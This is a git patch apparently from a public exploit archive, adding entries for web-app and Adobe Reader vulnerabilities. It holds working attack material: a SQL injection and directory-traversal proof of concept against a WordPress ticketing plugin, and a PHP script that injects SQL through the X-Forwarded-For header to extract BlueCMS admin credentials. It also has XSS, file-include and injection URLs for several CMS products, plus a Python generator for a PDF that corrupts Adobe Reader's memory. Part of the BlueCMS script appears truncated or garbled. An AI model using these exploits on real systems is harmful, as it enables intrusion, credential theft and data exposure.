From ad75a1324dd6f8d53a833f79ab65fc8a74c6d237 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 12 Sep 2014 04:45:04 +0000
Subject: [PATCH] Updated 09_12_2014

---
 files.csv | 10 +++
 platforms/php/webapps/34589.txt | 52 ++++++++++++++++
 platforms/php/webapps/34604.php | 90 +++++++++++++++++++++++++++
 platforms/php/webapps/34605.txt | 11 ++++
 platforms/php/webapps/34606.txt | 9 +++
 platforms/php/webapps/34607.txt | 9 +++
 platforms/php/webapps/34608.txt | 9 +++
 platforms/php/webapps/34609.txt | 9 +++
 platforms/php/webapps/34610.txt | 9 +++
 platforms/php/webapps/34611.txt | 9 +++
 platforms/windows/dos/34603.py | 106 ++++++++++++++++++++++++++++
 11 files changed, 323 insertions(+)
 create mode 100755 platforms/php/webapps/34589.txt
 create mode 100755 platforms/php/webapps/34604.php
 create mode 100755 platforms/php/webapps/34605.txt
 create mode 100755 platforms/php/webapps/34606.txt
 create mode 100755 platforms/php/webapps/34607.txt
 create mode 100755 platforms/php/webapps/34608.txt
 create mode 100755 platforms/php/webapps/34609.txt
 create mode 100755 platforms/php/webapps/34610.txt
 create mode 100755 platforms/php/webapps/34611.txt
 create mode 100755 platforms/windows/dos/34603.py
diff --git a/files.csv b/files.csv
index 0a50179b9..bd5f0ad0d 100755
--- a/files.csv
+++ b/files.csv
@@ -31147,6 +31147,7 @@ id,file,description,date,author,platform,type,port
 34586,platforms/php/webapps/34586.txt,"Mpay24 PrestaShop Payment Module 1.5 - Multiple Vulnerabilities",2014-09-08,"Eldar Marcussen",php,webapps,80
 34587,platforms/multiple/webapps/34587.txt,"Jenkins 1.578 - Multiple Vulnerabilities",2014-09-08,JoeV,multiple,webapps,8090
 34588,platforms/aix/dos/34588.txt,"PHP Stock Management System 1.02 - Multiple Vulnerabilty",2014-09-09,jsass,aix,dos,0
+34589,platforms/php/webapps/34589.txt,"Wordpress WP Support Plus Responsive Ticket System 2.0 Plugin - Multiple Vulnerabilities",2014-09-09,"Fikri Fadzil",php,webapps,0
 34592,platforms/linux/shellcode/34592.c,"Obfuscated Shellcode Linux x86 - chmod 777 (/etc/passwd + /etc/shadow) & Add New Root User & Execute /bin/bash",2014-09-09,"Ali Razmjoo",linux,shellcode,0
 34594,platforms/windows/remote/34594.rb,"ManageEngine Desktop Central StatusUpdate Arbitrary File Upload",2014-09-09,metasploit,windows,remote,8020
 34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 Remote Root Code Execution Vulnerability",2014-09-09,eF,linux,remote,80
@@ -31157,3 +31158,12 @@ id,file,description,date,author,platform,type,port
 34600,platforms/php/webapps/34600.txt,"Match Agency BiZ edit_profile.php important Parameter XSS",2009-09-11,Moudi,php,webapps,0
 34601,platforms/php/webapps/34601.txt,"Match Agency BiZ report.php pid Parameter XSS",2009-09-11,Moudi,php,webapps,0
 34602,platforms/windows/dos/34602.html,"Microsoft Internet Explorer 7/8 CSS Handling Cross Domain Information Disclosure Vulnerability",2010-09-06,"Chris Evans",windows,dos,0
+34603,platforms/windows/dos/34603.py,"Adobe Acrobat and Reader <= 9.3.4 'acroform_PlugInMain' Memory Corruption Vulnerability",2010-09-06,ITSecTeam,windows,dos,0
+34604,platforms/php/webapps/34604.php,"BlueCMS 1.6 'X-Forwarded-For' Header SQL Injection Vulnerability",2010-09-06,cnryan,php,webapps,0
+34605,platforms/php/webapps/34605.txt,"Horde Application Framework <= 3.3.8 'icon_browser.php' Cross-Site Scripting Vulnerability",2010-09-06,"Moritz Naumann",php,webapps,0
+34606,platforms/php/webapps/34606.txt,"Webformatique Reservation Manager `index.php' Cross Site Scripting Vulnerability",2009-09-02,Moudi,php,webapps,0
+34607,platforms/php/webapps/34607.txt,"TBDev 2.0 Remote File Include and SQL Injection Vulnerabilities",2010-09-02,Inj3ct0r,php,webapps,0
+34608,platforms/php/webapps/34608.txt,"HeffnerCMS 1.22 'index.php' Local File Include Vulnerability",2010-09-06,"MiND C0re",php,webapps,0
+34609,platforms/php/webapps/34609.txt,"MySource Matrix 'char_map.php' Multiple Cross Site Scripting Vulnerabilities",2010-09-06,"Gjoko Krstic",php,webapps,0
+34610,platforms/php/webapps/34610.txt,"zenphoto 1.3 zp-core/full-image.php a Parameter SQL Injection",2010-09-07,"Bogdan Calin",php,webapps,0
+34611,platforms/php/webapps/34611.txt,"Zenphoto 1.3 zp-core/admin.php Multiple Parameter XSS",2010-09-07,"Bogdan Calin",php,webapps,0
diff --git a/platforms/php/webapps/34589.txt b/platforms/php/webapps/34589.txt
new file mode 100755
index 000000000..5480f1908
--- /dev/null
+++ b/platforms/php/webapps/34589.txt 
@@ -0,0 +1,52 @@ +# Exploit Title: Wordpress WP Support Plus Responsive Ticket System 2.0 +Plugin - Multiple Vulnerabilities +# Google Dork: N/A +# Date: 09.09.2014 +# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org +# Vendor Homepage - http://wpsuportplus.byethost7.com/ +# Software +http://wordpress.org/plugins/wp-support-plus-responsive-ticket-system/ +# Version: 2.0 +# Tested on: PHP + + +Description: +This plugin adds to WordPress the features of a complete ticket system with +100% responsive and 100% Ajax functionality. This allows users to submit +tickets to report problems or get support on whatever you want. Users can +set the status, priority and category of each ticket. + + +Proof of Concept: + +1. SQL INJECTION +URL : http://localhost/wp-admin/admin-ajax.php +METHOD : POST +REQUEST : action=openTicket&ticket_id=-1 UNION SELECT +concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7 +* any registered user can successfully execute this request + + +2. FULL PATH DISCLOSURE +a) URL : +http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=/var/www/wp-content/uploads/2014/09/file.pdf + * full path to the file will be shown to the user after the file has been +uploaded +b) URL : +http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path= + * full path will be shown in PHP error message if parameter "path" is empty + + +3. DIRECTORY TRAVERSAL +URL : +http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=/etc/passwd +* any file from the server can be downloaded by giving parameter "path" the +location to the file + + +4. 
BROKEN AUTHENTICATION +URL : +http://localhost/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path= +* The script "downloadAttachment.php" is accessible for anyone without +having to login. diff --git a/platforms/php/webapps/34604.php b/platforms/php/webapps/34604.php new file mode 100755 index 000000000..1d0444f8e --- /dev/null +++ b/platforms/php/webapps/34604.php 
@@ -0,0 +1,90 @@ +source: http://www.securityfocus.com/bid/42999/info + +BlueCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +') from blue_admin),'1281181973','99"; + $data = "POST ".$path."comment.php?act=send HTTP/1.1\r\n"; + $data .= "Accept: */*\r\n"; + $data .= "Accept-Language: zh-cn\r\n"; + $data .= "Content-Type: application/x-www-form-urlencoded\r\n"; + $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; + $data .= "Host: $host\r\n"; + $data .= "Content-Length: ".strlen($cmd)."\r\n"; + $data .= "Connection: Close\r\n"; + $data .= "X-Forwarded-For: $getinj\r\n\r\n"; + $data .= $cmd; + + $fp = fsockopen($host, 80); + fputs($fp, $data); + + $resp = ''; + + while ($fp && !feof($fp)) + $resp .= fread($fp, 1024); + + return $resp; +} + +function send2() +{ +global $host, $path; +$message="GET ".$path."news.php?id=1 HTTP/1.1\r\n"; +$message.="Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */*\r\n"; +$message.="Accept-Language: zh-cn\r\n"; +$message.="Accept-Encoding: gzip, deflate\r\n"; +$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; GreenBrowser)\r\n"; +$message.="Host: $host\r\n"; +$message.="Connection: Keep-Alive\r\n\r\n"; +$fd = fsockopen($host,'80'); +if(!$fd) +{ + echo '[-]No response from'.$host; + die; +} +fputs($fd,$message); +$resp = ''; +while (!feof($fd)) { + $resp.=fgets($fd); +} +fclose($fd); +preg_match_all("//",$resp,$db); +if($db[1][0]&$db[2][0]) +{ +echo 
"username->".$db[1][0]."\r\n"; +echo "password->".$db[2][0]."\r\n"; +echo "[+]congratulation ^ ^"; +}else die('[-]exploited fail >"<'); +} +?> \ No newline at end of file diff --git a/platforms/php/webapps/34605.txt b/platforms/php/webapps/34605.txt new file mode 100755 index 000000000..98cca8a3a --- /dev/null +++ b/platforms/php/webapps/34605.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/43001/info + +Horde Application Framework is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +This issue affects versions prior to and including Horde 3.3.8. + +Note that additional products that use the Horde framework may also be vulnerable. + +http://www.example.com/util/icon_browser.php?subdir=[xss]&app=horde \ No newline at end of file diff --git a/platforms/php/webapps/34606.txt b/platforms/php/webapps/34606.txt new file mode 100755 index 000000000..8664bd1e2 --- /dev/null +++ b/platforms/php/webapps/34606.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/43003/info + +Webformatique Reservation Manager is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Webformatique Reservation Manager 2.4.0 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?resman_startdate=[XSS] \ No newline at end of file 
diff --git a/platforms/php/webapps/34607.txt b/platforms/php/webapps/34607.txt
new file mode 100755
index 000000000..43f5c5d30
--- /dev/null
+++ b/platforms/php/webapps/34607.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43004/info
+
+TBDev is prone to multiple input-validation vulnerabilities, including a remote file-include issue and an SQL-injection issue.
+
+A successful exploit may allow an attacker to execute malicious code within the context of the webserver process, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+TBDev 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/admincp.php?rootpath=(rfi)
\ No newline at end of file
diff --git a/platforms/php/webapps/34608.txt b/platforms/php/webapps/34608.txt
new file mode 100755
index 000000000..b4d0ce241
--- /dev/null
+++ b/platforms/php/webapps/34608.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43006/info
+
+HeffnerCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
+
+HeffnerCMS 1.22 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?page=lang/interface_en.lng%00
\ No newline at end of file
diff --git a/platforms/php/webapps/34609.txt b/platforms/php/webapps/34609.txt
new file mode 100755
index 000000000..23b43e006
--- /dev/null
+++ b/platforms/php/webapps/34609.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43020/info
+
+MySource Matrix is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects MySource Matrix 3.28.3; other versions may also be affected.
+
+http://www.example.com/fudge/wysiwyg/plugins/special_chars/char_map.php?width=233%3C/script%3E&height=233%3Cscript%3Ealert%28%27zsl%27%29%3C%2fscript%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34610.txt b/platforms/php/webapps/34610.txt
new file mode 100755
index 000000000..7c4f767d6
--- /dev/null
+++ b/platforms/php/webapps/34610.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43021/info
+
+Zenphoto is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Zenphoto 1.3 is vulnerable; other versions may also be affected.
+
+/zenphoto_1_3/zp-core/full-image.php?a=%24%7binjecthere%7d&i=system-bug.jpg&q=75
\ No newline at end of file
diff --git a/platforms/php/webapps/34611.txt b/platforms/php/webapps/34611.txt
new file mode 100755
index 000000000..ef7142ed0
--- /dev/null
+++ b/platforms/php/webapps/34611.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43021/info
+
+Zenphoto is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Zenphoto 1.3 is vulnerable; other versions may also be affected.
+
+/zenphoto_1_3/zp-core/admin.php?from=%22%20onmouseover%3dprompt%28934419%29%20bad%3d%22
\ No newline at end of file
diff --git a/platforms/windows/dos/34603.py b/platforms/windows/dos/34603.py
new file mode 100755
index 000000000..23667caba
--- /dev/null
+++ b/platforms/windows/dos/34603.py
@@ -0,0 +1,106 @@ +source: http://www.securityfocus.com/bid/42998/info + +Adobe Acrobat and Reader are prone to a remote memory-corruption vulnerability. + +Attackers can exploit this issue to execute arbitrary code or cause denial-of-service conditions. + +#!user/bin/python + +_doc_ = ''' +------------------------------------------------------------------------- +title : adobe acrobat reader acroform_PlugInMain memory corruption +Product: Adobe Acrobat Reader +Version: 7.x, 8.x, 9.x +Tested : 8.1 - 9.1 - 9.2 - 9.3.3 - 9.3.4 +Product Homepage: www.adobe.com +Tested Os : Windows XP SP1/SP3 EN + Windows Seven +AUTHOR : ITSecTeam +Email : Bug@ITSecTeam.com +Website : http://www.itsecteam.com +Forum : http://forum.ITSecTeam.com +-------------------------------------------------------------------------- +''' +import sys + + +def main(): + buffer = "%PDF-1.7" + buffer += "\n1 0 obj\n" + buffer += "<<\n" + buffer += "/Kids [2 0 R]\n" + buffer += "/Count 1\n" + buffer += "/Type /Pages\n" + buffer += ">>\n" + buffer += "endobj\n" + buffer += "2 0 obj\n" + buffer += "<<\n" + buffer += "/Group\n" + buffer += "<<\n" + buffer += ">>\n" + buffer += "/Parent 1 0 R\n" + buffer += "/Annots [3 0 R ]\n" + buffer += ">>\n" + buffer += "endobj\n" + buffer += "3 0 obj\n" + buffer += "<<\n" + buffer += "/Subtype /Widget\n" + buffer += "/Rect []\n" + buffer += "/FT /Btn\n" + buffer += ">>\n" + buffer += "endobj\n" + buffer += "4 0 obj\n" + buffer += "<<\n" + buffer += "/Names\n" + buffer += "<<\n" + buffer += ">>\n" + buffer += "/Pages 1 0 R\n" + buffer += "/OCProperties\n" + buffer += "<<\n" + buffer += "/D\n" + buffer += "<<\n" + buffer += ">>\n" + buffer += ">>\n" + buffer += "/AcroForm\n" + buffer += "<<\n" + buffer += "/NeedAppearances true\n" + buffer += "/DR\n" + buffer += "<<\n" + buffer += "/Font\n" + buffer += "<<\n" + buffer += ">>\n" + buffer += ">>\n" + buffer += ">>\n" + buffer += "/ViewerPreferences\n" + buffer += "<<\n" + buffer += ">>\n" + buffer += ">>\n" + buffer += 
"endobj xref\n" + buffer += "0000000000 65535 f\n" + buffer += "0000000015 00000 n\n" + buffer += "0000000074 00000 n\n" + buffer += "0000000199 00000 n\n" + buffer += "0000000280 00000 n\n" + buffer += "trailer\n" + buffer += "<<\n" + buffer += "/Root 4 0 R\n" + buffer += "/Size 5\n" + buffer += ">>\n" + buffer += "startxref\n" + buffer += "449\n" + buffer += "%%EOF\n" + + + try: + print "[+] Creating POC file.." + exploit = open('crash.pdf','w'); + exploit.write(buffer); + exploit.close(); + print "[+] POC file created!" + except: + print "[-] Error: try again" + sys.exit(0) + +if __name__=="__main__": + print _doc_ + main()